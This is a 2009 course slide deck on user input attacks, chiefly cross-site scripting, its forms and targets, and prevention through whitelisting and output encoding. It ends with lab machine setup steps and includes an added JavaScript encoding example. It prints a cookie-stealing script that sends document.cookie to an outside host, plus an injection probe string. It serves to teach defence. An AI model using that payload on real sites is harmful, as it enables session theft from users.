
User Input Attacks, CPSC 328, Spring 2009 (PDF slide deck)



  1. User Input Attacks, CPSC 328, Spring 2009
  Review
  - Abstract lower level security
    - Provide end-to-end security
    - User security info to server
  - WS-Security
    - XML Encryption
    - XML Signature
    - Tokens
  - Authentication/Authorization
    - SAML
    - XACML
    - SSO
  - Gathering system information
    - Site mapping
    - Comments/error codes
    - Library/plugin vulnerabilities

  2. User Input
  - Cannot trust anything coming from the user
    - Form data
    - URLs
    - Scripts
  - Must hold input as suspect until it has been processed/cleared somehow
  - Let the games begin…
  Cross-Site Scripting
  - Trick some poor soul into giving you their data
  - Embed code into HTML
  - A subset of HTML injection
  - Can happen when the server accepts data from a user and sends it to a web browser without validation/encoding
  - When a user connects to the site, the script runs
  - Most frequent vector: JavaScript
  - Outcomes
    - Data is sent (stolen) to another server
    - Web sites defaced
    - Control of the user's browser

  3. XSS: Details
  - Three forms: stored, reflected, and DOM injection
  - Target sites: blogs, forums, forms; anything that receives info and displays it back to the user
  - What sort of data is targeted?
    - Session IDs
    - Personal info
    - Anything affiliated with the current page
  - Can rewrite the page or steal user info
  XSS: Tags
  - Some vulnerable tags: script, html, body, img, object, applet, frame, frameset, iframe, layer, style, embed, meta, href
  - How compromised?
    - Form input stored for display
    - URL/link mangling (embedded script)
    - Web bugs to send the cookie:
      <script> document.write("<img src=\"http:innocent.com/bug.gif?cookie="+document.cookie+"\"") </script>

  4. Poking for Holes
  - Try script-ish characters in input and see what happens: <, >, /, :, '
  - Example (misusing a text entry field):
      username: '); bad_code_here;//
      password:
  - Character encoding to hide brackets, "script", "java", etc.
  - Movie
  Prevention
  - Can try to rule out all the "bad stuff"
    - Difficult to do
    - Always finding new "bad stuff"
  - Easier to enumerate the "good stuff"
  - Use different formatting tags for text entry (blogs, etc.)
  - Encode all user-entered text

  5. Prevention Details
  - Validate input (before using it): accept known good, reject bad input
  - Encode output (before sending it to the browser): strong encoding, do almost everything
  - Specify output encoding
  - Specify document encoding
  - Don't use blacklisting for validation: again, easier to whitelist than blacklist
  Machine Setup
  - Make sure you are sitting at machine # 4, 12, 15, 17, 19, 22, 24
  - Boot to Linux
  - Create account
  - Set up Apache
  - Set up SSH
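The two controls the Prevention slides recommend, whitelist validation of input and encoding of output, as an added JavaScript example that is not from the course slides; the username pattern, the entity table and the sample inputs are my own assumptions, and the "unsafe" renderer is only there to show what raw concatenation produces next to the encoded form.

```javascript
// Added example (not from the slides): whitelist validation plus HTML
// output encoding, the two controls listed on the "Prevention Details" slide.

// Whitelist (assumed policy): a username is 1-32 letters, digits, dot,
// dash or underscore. Quotes, brackets, semicolons and "//" never pass.
const USERNAME_RE = /^[A-Za-z0-9._-]{1,32}$/;

function isValidUsername(name) {
  return typeof name === "string" && USERNAME_RE.test(name);
}

// Output encoding: the characters that carry meaning in HTML become entities,
// so user text is rendered as data rather than parsed as markup or script.
const ENTITY_MAP = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};

function encodeHtml(text) {
  return String(text).replace(/[&<>"'\/]/g, (ch) => ENTITY_MAP[ch]);
}

// Raw concatenation: the pattern the XSS slides describe (user data sent to
// the browser without encoding). Kept only for side-by-side comparison.
function renderUnsafe(name) {
  return "<p>Welcome, " + name + "</p>";
}

// Encoded output: what the slide recommends before sending to the browser.
function renderSafe(name) {
  return "<p>Welcome, " + encodeHtml(name) + "</p>";
}

// Constructed sample inputs: a normal name, the probe string from the
// "Poking for Holes" slide, and a script tag like the "XSS: Tags" web bug.
const SAMPLES = [
  "alice",
  "'); bad_code_here;//",
  "<script>document.write('x')</script>",
];

// Returns, per sample, whether the whitelist accepts it and both renderings.
function demo() {
  return SAMPLES.map((s) => ({
    input: s,
    accepted: isValidUsername(s),
    unsafe: renderUnsafe(s),
    safe: renderSafe(s),
  }));
}
```

Only the first sample passes the whitelist; for the other two, `safe` contains no `<`, `>` or quote characters, so the browser shows the probe text instead of executing it.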

  6. Create Account
  - Log in: user cpsc, passwd cpsccpsc
  - su (passwd: cpsccpsc)
  - Create your account
    - <login>: last name
    - password: something you can remember
    - useradd -c "<firstname> <lastname>" -m <login>
    - passwd <login>, then enter the password when prompted
  - Log out (entirely)
  Config Machine
  - Log in as you
  - Kill off things you don't need: mail, samba, wireless, cupsd, bind, nfsd
  - Launch/configure the following: Apache (httpd), sshd, ntpd, mysqld
  - For now, just get them running in multi-user mode (run level 3 - 5)
  - Don't worry about firewalls (for now)
